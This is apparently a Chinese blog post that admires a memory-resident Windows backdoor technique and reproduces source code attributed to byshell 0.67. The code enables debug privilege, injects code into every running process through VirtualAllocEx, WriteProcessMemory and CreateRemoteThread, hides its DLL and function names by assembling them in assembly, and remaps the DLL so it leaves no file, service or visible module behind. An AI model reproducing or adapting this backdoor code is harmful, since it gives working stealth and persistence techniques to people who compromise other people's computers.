一个不错的思路隐藏后门，利用线程注射DLL到系统进程，解除DLL映射，并删除自身DLL和EXE文件，删除自身创建的服务，仅仅存在于内存中。于是在寄主机器上无法找到任何新增服务项，磁盘文件或者是进程空间里的不明DLL。关机时，该程序会截获关机的调用，在系统关闭之前恢复自己。缺点是不正常重启之后后门消失.....

　　以下代码引自byshell0.67，你可以从Xfocus上获取源代码(baiyuanfan大侠的作品撒～)一直没看过后门那些东西的，今天别人提到，没想到有这么不错的东西啊......

　　void injcode(){HANDLE prohandle;DWORD pid=0;int ret;int tmp;HANDLE fm;

　　//SE_DEBUG_NAME

　　HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;

　　LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;

　　AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);

　　//retrive pid from toolhelp32

　　Sleep(1000);

　　HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

　　struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);

　　ret=(int)CreateMutex(0,0,"by067clean");

　　if(!ret){MessageBox(0,0,0,0);goto err1;}

　　ret=(int)CreateMutex(0,0,"by067revive");

　　if(!ret){MessageBox(0,0,0,0);goto err1;}

　　ret=(int)CreateEvent(0,0,1,"by067check");//初始status设置1!切记

　　if(!ret){MessageBox(0,0,0,0);goto err1;}

　　fm=CreateFileMapping((HANDLE)-1,0,PAGE_READWRITE,0,1024,"by067filemapping");

　　if(!fm){MessageBox(0,0,0,0);goto err1;}

　　//filemapping权限要设置为任何人可读写

　　PACL pdacl;

　　PACL pnewdacl;

　　PSECURITY_DESCRIPTOR psd;

　　EXPLICIT_ACCESS ace;

　　int ret1;

　　GetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,&pdacl,0,&psd);

　　ace.grfAccessPermissions=GENERIC_ALL;

　　ace.grfAccessMode=GRANT_ACCESS;

　　ace.grfInheritance=NO_INHERITANCE;

　　ace.Trustee.pMultipleTrustee=0;

　　ace.Trustee.MultipleTrusteeOperation=NO_MULTIPLE_TRUSTEE;

　　ace.Trustee.TrusteeForm=TRUSTEE_IS_NAME;

　　ace.Trustee.TrusteeType=TRUSTEE_IS_GROUP;

　　ace.Trustee.ptstrName="EVERYONE";

　　SetEntriesInAcl(1,&ace,pdacl,&pnewdacl);

　　ret1=SetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pnewdacl,0);

　　if(ret1){goto err2;}

　　//char injexe[]="explorer.exe";//for dbg only process

　　for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){

　　//if(stricmp(processsnap.szExeFile,injexe)){continue;}

　　if(processsnap.th32ProcessID<10){continue;}

　　if(!stricmp(processsnap.szExeFile,MAINPROC1)){injapistr.ismainthread=1;}

　　else if(!stricmp(processsnap.szExeFile,MAINPROC2)){injapistr.ismainthread=2;}

　　else{injapistr.ismainthread=0;}

　　pid=processsnap.th32ProcessID;

　　//inj

　　prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);

　　if(ReadProcessMemory(prohandle,(void*)0x19850000,&tmp,4,(DWORD*)&ret)==1){continue;}

　　//已经装载了byshell一次?不做动作

　　DWORD WINAPI injfunc(LPVOID);

　　HMODULE hModule;LPVOID paramaddr;

　　hModule=LoadLibrary("kernel32.dll");

　　injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");

　　injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");

　　injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");

　　injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");

　　injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");

　　injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");

　　paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

　　ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);

　　void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

　　ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);

　　ret=(int)CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);

　　if(!ret){int tmp=GetLastError();

　　#ifdef bydbg

　　OutputDebugString("cannot infect process:see pid in edx,err code in eax\n");

　　__asm mov eax,tmp

　　__asm mov edx,pid

　　__asm int 3;

　　#endif

　　}

　　CloseHandle(prohandle);

　　}//end for

　　CloseHandle(snapshot);

　　return;

　　{

　　err1:

　　#ifdef bydbg

　　OutputDebugString("create global obj failed\n");

　　__asm int 3;

　　#endif

　　return;

　　}

　　{

　　err2:

　　#ifdef bydbg

　　OutputDebugString("cannot set DACL of section,see err code in eax\n");

　　__asm mov eax,ret1

　　__asm int 3;

　　#endif

　　return;

　　}

　　}

　　DWORD WINAPI injfunc(LPVOID paramaddr){

　　char ntboot[16];char msgbox[16];

　　INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr;

　　__asm{

　　mov ntboot,’n’

　　mov ntboot+1,’t’

　　mov ntboot+2,’b’

　　mov ntboot+3,’o’

　　mov ntboot+4,’o’

　　mov ntboot+5,’t’

　　mov ntboot+6,’.’

　　mov ntboot+7,’d’

　　mov ntboot+8,’l’

　　mov ntboot+9,’l’

　　mov ntboot+10,0

　　mov msgbox,’C’

　　mov msgbox+1,’m’

　　mov msgbox+2,’d’

　　mov msgbox+3,’S’

　　mov msgbox+4,’e’

　　mov msgbox+5,’r’

　　mov msgbox+6,’v’

　　mov msgbox+7,’i’

　　mov msgbox+8,’c’

　　mov msgbox+9,’e’

　　mov msgbox+10,0

　　}

　　HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);

　　if((int)hModule!=0x19850000){return 0;}//特殊情况

　　DWORD (WINAPI *myCmdService)(LPVOID);

　　myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox));

　　unsigned int memsize=0;

　　void * tempdll=pinjapistr->myVirtualAlloc(0,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

　　memcpy(tempdll,hModule,DLLIMAGESIZE);

　　pinjapistr->myFreeLibrary(hModule);

　　hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

　　memcpy(hModule,tempdll,DLLIMAGESIZE);pinjapistr->myVirtualFree(tempdll,DLLIMAGESIZE,MEM_DECOMMIT);

　　//

　　myCmdService((void*)(pinjapistr->ismainthread));

　　return 0;

　　}